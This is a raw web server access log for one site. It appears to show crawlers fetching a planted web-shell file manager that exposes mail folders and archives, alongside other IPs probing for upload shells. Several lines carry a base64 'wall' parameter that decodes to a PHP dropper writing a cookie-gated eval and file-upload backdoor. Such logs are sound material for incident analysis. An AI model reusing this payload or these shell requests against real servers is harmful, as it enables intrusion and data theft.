66.249.64.109 - - [07/Dec/2025:06:31:11 +0000] "GET /aeee1/?gzfile=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA5MjAyMi5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 42771 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
194.68.32.135 - - [07/Dec/2025:06:31:31 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2657.30 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:06:31:31 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2657.30 Safari/537.36"
66.249.64.109 - - [07/Dec/2025:06:19:15 +0000] "GET /aeee1/?fm=true&rename=new&path=/home/i446698/mail/metalescrose.com/customercare/.Trash/ HTTP/1.1" 200 8143 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.110 - - [07/Dec/2025:06:20:06 +0000] "GET /aeee1/?fm=true&path=/home/i446698/.cagefs/var/cpanel/php HTTP/1.1" 200 9246 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:24:43 +0000] "GET /aeee1/?fm=true&rename=dovecot-uidlist&path=/home/i446698/mail/metalescrose.com/hr/.Sent/ HTTP/1.1" 200 8184 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:24:55 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/metalescrose.com/contact/.Sent/cur HTTP/1.1" 200 8901 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:24:56 +0000] "GET /aeee1/?fm=true&rights=awstats052024.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.110 - - [07/Dec/2025:06:25:00 +0000] "GET /aeee1/?fm=true&rename=awstats062023.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8146 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:25:21 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA4MjAyNS5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 8080 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:25:21 +0000] "GET /aeee1/?fm=true&rename=composer&path=/home/i446698/public_html/seughtunghdyyshry/admin/assets/vendor/ HTTP/1.1" 200 8160 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:28:36 +0000] "GET /aeee1/?fm=true&rights=awstats092025.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:28:36 +0000] "GET /aeee1/?fm=true&rights=awstats092023.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:29:51 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA5MjAyNC5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 6900 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:30:29 +0000] "GET /aeee1/?fm=true&rights=awstats072023.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:32:42 +0000] "GET /aeee1/?fm=true&rights=awstats072022.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:32:55 +0000] "GET /aeee1/?zip=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vam91cm5hbGlzdC8uSnVuay9uZXc= HTTP/1.1" 200 43623 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:33:09 +0000] "GET /aeee1/?fm=true&rename=.Trash&path=/home/i446698/mail/metalescrose.com/projects/ HTTP/1.1" 200 8134 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:33:49 +0000] "GET /aeee1/?fm=true&edit=1762199219.M756126P1290409.altar45.supremepanel45.com,S=6326,W=6495&path=/home/i446698/mail/metalescrose.com/contracts/new/ HTTP/1.1" 200 10544 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:34:22 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA1MjAyMi5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 4943 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:34:25 +0000] "GET /aeee1/?gz=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC82OGZlNA== HTTP/1.1" 200 6464 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:34:33 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vY29udHJhY3RzL25ldy8xNzYyMTk5MTg0Lk0zMjYxODlQODE5Mjk2LmFsdGFyNDUuc3VwcmVtZXBhbmVsNDUuY29tLFM9NjM2MSxXPTY1MzA= HTTP/1.1" 200 2174 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:34:45 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vY29udHJhY3RzL25ldy8xNzYyMTk5MTg0Lk0zMjYxODlQODE5Mjk2LmFsdGFyNDUuc3VwcmVtZXBhbmVsNDUuY29tLFM9NjM2MSxXPTY1MzA= HTTP/1.1" 200 2180 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.109 - - [07/Dec/2025:06:35:30 +0000] "GET /aeee1/?zip=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vY29udHJhY3RzLy5EcmFmdHMvbmV3 HTTP/1.1" 200 43505 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:35:43 +0000] "GET /b69e7/?path=/home/i446698/public_html/26d47 HTTP/1.1" 200 889 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:36:09 +0000] "GET /aeee1/?fm=true&edit=.contactemail.contactemail.tar.gz&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 8639 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:24:24 +0000] "GET /aeee1/?fm=true&rights=tmp&path=/home/i446698/mail/metalescrose.com/it/.Sent/ HTTP/1.1" 200 8205 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:26:03 +0000] "GET /aeee1/?fm=true&rights=1762199237.M454356P1290435.altar45.supremepanel45.com,S=6271,W=6440&path=/home/i446698/mail/metalescrose.com/contracts/new/ HTTP/1.1" 200 8159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.108 - - [07/Dec/2025:06:26:52 +0000] "GET /aeee1/?gzfile=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA5MjAyNC5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 42894 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:26:56 +0000] "GET /aeee1/?gzfile=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA1MjAyMi5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 42628 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:27:36 +0000] "GET /aeee1/?fm=true&rights=qr&path=/home/i446698/public_html/seughtunghdyyshry/ HTTP/1.1" 200 8172 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:28:42 +0000] "GET /aeee1/?gzfile=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA3MjAyNC5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 43682 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:30:45 +0000] "GET /aeee1/?fm=true&rename=awstats072022.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8188 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:30:46 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvd2ViYWxpemVyL3VzYWdlXzIwMjUwOS5odG1s HTTP/1.1" 200 7744 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.68.32.135 - - [07/Dec/2025:06:31:30 +0000] "GET / HTTP/1.1" 200 1726 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2657.30 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:06:31:30 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2657.30 Safari/537.36"
66.249.64.108 - - [07/Dec/2025:06:34:51 +0000] "GET /aeee1/?fm=true&rename=dovecot-uidvalidity.69078d97.69078d97.tar.gz&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 8154 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:34:55 +0000] "GET /aeee1/?fm=true&rename=awstats072023.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8146 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
194.68.32.135 - - [07/Dec/2025:06:31:31 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2657.30 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:06:31:31 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2657.30 Safari/537.36"
66.249.64.109 - - [07/Dec/2025:06:31:50 +0000] "GET /aeee1/?fm=true&edit=awstats072025.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 17701 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:32:29 +0000] "GET /aeee1/?fm=true&rename=awstats052023.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8146 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:33:59 +0000] "GET /aeee1/?fm=true&edit=generate-attachment.php&path=/home/i446698/public_html/seughtunghdyyshry/admin/ HTTP/1.1" 200 12583 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:34:12 +0000] "GET /aeee1/?fm=true&edit=awstats052023.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 14458 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:35:56 +0000] "GET /aeee1/?fm=true&rights=all_iplist.db.tar&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 8169 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:36:48 +0000] "GET /aeee1/?fm=true&edit=dovecot.index.log&path=/home/i446698/mail/metalescrose.com/relations/ HTTP/1.1" 200 8714 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:36:35 +0000] "GET /aeee1/?fm=true&edit=.trash.tar&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 8528 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:36:38 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA5MjAyMy5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 6255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:36:41 +0000] "GET /aeee1/?fm=true&rights=awstats092022.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8119 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:06:38:28 +0000] "GET /aeee1/?fm=true&rename=awstats082024.metalescrose.com.txt&path=/home/i446698/tmp/awstats/ssl/ HTTP/1.1" 200 8146 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:39:17 +0000] "GET /aeee1/?fm=true&rename=dovecot-uidlist&path=/home/i446698/mail/metalescrose.com/billing/.Junk/ HTTP/1.1" 200 8136 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:36:15 +0000] "GET /aeee1/?gzfile=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA1MjAyMy5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 43109 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:38:43 +0000] "GET /aeee1/?zip=L2hvbWUvaTQ0NjY5OC9tYWlsLy5KdW5rL3RtcA== HTTP/1.1" 200 43729 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:38:59 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9zc2wvYXdzdGF0czA3MjAyMi5tZXRhbGVzY3Jvc2UuY29tLnR4dA== HTTP/1.1" 200 4234 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:39:00 +0000] "GET /aeee1/?fm=true&rights=contracts@metalescrose.com.tar.gz&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 8131 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:39:00 +0000] "GET /aeee1/?fm=true&rights=.metadata.metadata.tar.gz&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 8131 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:39:24 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS8zMTgxYS50YXIuZ3o= HTTP/1.1" 200 2361 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:39:47 +0000] "GET /aeee1/?fm=true&edit=.spam.tar.gz&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 8743 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.110 - - [07/Dec/2025:06:40:42 +0000] "GET /aeee1/?fm=true&edit=new.tar.gz&path=/home/i446698/public_html/aeee1/ HTTP/1.1" 200 10121 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.108 - - [07/Dec/2025:06:41:07 +0000] "GET /aeee1/?gz=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vcGFydG5lcnNoaXBzLy5EcmFmdHMvY3Vy HTTP/1.1" 200 43345 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
146.103.119.117 - - [07/Dec/2025:06:41:13 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
146.103.119.117 - - [07/Dec/2025:06:41:14 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
